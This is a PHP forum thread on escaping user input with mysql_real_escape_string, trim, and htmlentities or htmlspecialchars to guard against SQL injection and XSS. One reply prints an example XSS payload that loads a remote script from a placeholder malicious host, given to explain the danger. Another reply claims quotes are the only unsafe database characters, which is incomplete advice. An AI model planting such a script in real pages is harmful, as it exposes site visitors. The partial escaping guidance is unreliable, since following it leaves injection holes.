SitePoint Sponsor

User Tag List

Results 1 to 12 of 12
  1. #1
    SitePoint Guru
    Join Date
    Nov 2008
    Posts
    622
    Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

    mysql real escape string with numeric value

    hi all

    i m using below code for validating phone number

    PHP Code:
    if(is_numeric($phone_number)) 
    Do i still need to use
    mysql_real_escape_string with the above code even if i m not inserting it into the database till its not a numeric value

    vineet

  2. #2
    Hosting Team Leader silver trophybronze trophy
    cpradio's Avatar
    Join Date
    Jun 2002
    Location
    Ohio
    Posts
    5,122
    Mentioned
    152 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by vinpkl View Post
    hi all

    i m using below code for validating phone number

    PHP Code:
    if(is_numeric($phone_number)) 
    Do i still need to use
    mysql_real_escape_string with the above code even if i m not inserting it into the database till its not a numeric value

    vineet
    No, you don't need to use mysql_real_escape_string on your $phone_number variable, because you already proved it only contains numbers. So that variable alone could not provoke a SQL Injection.

  3. #3
    SitePoint Guru
    Join Date
    Nov 2008
    Posts
    622
    Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)
    hi cp

    trim should be used after it or before it

    PHP Code:
    mysql_real_escape_string(trim($_POST['username'])); 
    or
    PHP Code:
    trim(mysql_real_escape_string($_POST['username'])); 
    vineet

  4. #4
    Hosting Team Leader silver trophybronze trophy
    cpradio's Avatar
    Join Date
    Jun 2002
    Location
    Ohio
    Posts
    5,122
    Mentioned
    152 Post(s)
    Tagged
    0 Thread(s)
    I'm not sure it would make a difference, but I usually put trim inside the mysql_real_escape_string call (like your first example).

  5. #5
    SitePoint Guru
    Join Date
    Nov 2008
    Posts
    622
    Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)
    hi cp

    does htmlspecialchars() adds another layer of security if used along with mysql_real_escape_string

    vineet

  6. #6
    Hosting Team Leader silver trophybronze trophy
    cpradio's Avatar
    Join Date
    Jun 2002
    Location
    Ohio
    Posts
    5,122
    Mentioned
    152 Post(s)
    Tagged
    0 Thread(s)
    No, htmlspecialchars() does nothing for your database security, it does protect you against XSS attacks, and so should only be used when outputting the content to the page and I actually recommend htmlentities() instead of htmlspecialchars().

    Example:
    PHP Code:
    echo htmlentities($row['content']); 

  7. #7
    SitePoint Guru
    Join Date
    Nov 2008
    Posts
    622
    Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)
    hi cp

    I meant to know
    Suppose someone enter name as "vin@#$"

    then will it be safe to add the name as it is to database
    or
    we should first convert post data to htmlspecialchars or htmlentities and then add it to database.

    vineet

  8. #8
    Hosting Team Leader silver trophybronze trophy
    cpradio's Avatar
    Join Date
    Jun 2002
    Location
    Ohio
    Posts
    5,122
    Mentioned
    152 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by vinpkl View Post
    hi cp

    I meant to know
    Suppose someone enter name as "vin@#$"

    then will it be safe to add the name as it is to database
    or
    we should first convert post data to htmlspecialchars or htmlentities and then add it to database.

    vineet
    The only characters that are unsafe to a database are single and double quotes (which is why you use mysql_real_escape_string).

    htmlspecialchars or htmlentities DO NOT need to be used when inserting into the database/table. They only need to be used to prevent XSS attacks.

  9. #9
    SitePoint Guru
    Join Date
    Nov 2008
    Posts
    622
    Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)
    hi cp

    I m new to XSS so can you tell me

    XSS Attacks happens only while outputting the data from database
    or
    there are other occasions also when XSS attacks can happen.

    vineet

  10. #10
    Hosting Team Leader silver trophybronze trophy
    cpradio's Avatar
    Join Date
    Jun 2002
    Location
    Ohio
    Posts
    5,122
    Mentioned
    152 Post(s)
    Tagged
    0 Thread(s)
    XSS attacks can occur when you output ANY data that may have been entered by a User via QueryString, Form Data, data stored in a database, etc.

    In short, consider the following was entered by your user as a comment (assume this is valid JavaScript)
    Code:
    <script type="text/javascript">document.body.append('<script type="text/javascript' src='http://mymalicioussite.com/myscript.js'></script>');</script>
    Without using htmlentities, it will try and execute the JavaScript the user entered as a comment.

    With htmlentities, it will output the comment as TEXT, so it can't be executed, as it will substitute all of the < and > signs to be &lt; and &gt; along with the quotes.

    The database won't ever try to execute the JavaScript, so it remains unaffected, but when you write that content back to the page for a user to see, that is where it becomes a problem.

    Hopefully this makes sense. Good question

  11. #11
    SitePoint Guru
    Join Date
    Nov 2008
    Posts
    622
    Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)
    hi cp

    htmlentities() and htmlspecialchars()

    both functions work fine

    with particular one charset (UTF or ISO)

    or both charsets

    vineet

  12. #12
    Hosting Team Leader silver trophybronze trophy
    cpradio's Avatar
    Join Date
    Jun 2002
    Location
    Ohio
    Posts
    5,122
    Mentioned
    152 Post(s)
    Tagged
    0 Thread(s)
    If you look at the PHP manual pages for both htmlentities and htmlspecialchars, you will see which encodings are supported and that you can tell it to use a specific encoding (if you want).


Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •